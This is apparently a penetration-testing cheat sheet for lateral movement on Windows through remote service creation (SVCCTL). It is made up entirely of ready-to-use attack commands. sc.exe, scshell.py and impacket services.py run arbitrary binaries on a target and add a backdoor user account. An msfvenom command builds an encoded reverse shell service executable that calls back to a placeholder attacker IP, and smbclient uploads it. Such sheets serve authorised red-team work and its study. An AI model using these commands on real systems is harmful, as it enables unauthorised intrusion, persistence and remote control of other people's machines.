Services (SVCCTL)

#Create a service, get shell, delete service
scshell.py domain/<user>@<TARGET>

#Create remote service
sc.exe \\TARGET create MyService binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET create MyService binPath= "C:\Windows\TEMP\payload.exe" start= auto

#Start remote service
sc.exe \\TARGET start MyService

#Stop and delete a remote service
sc.exe \\TARGET stop MyService
sc.exe \\TARGET delete MyService

# create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name shell-svc

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name shell-svc

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name addme -display addme -path "net user munra Pass123 /add"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name addme

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name addme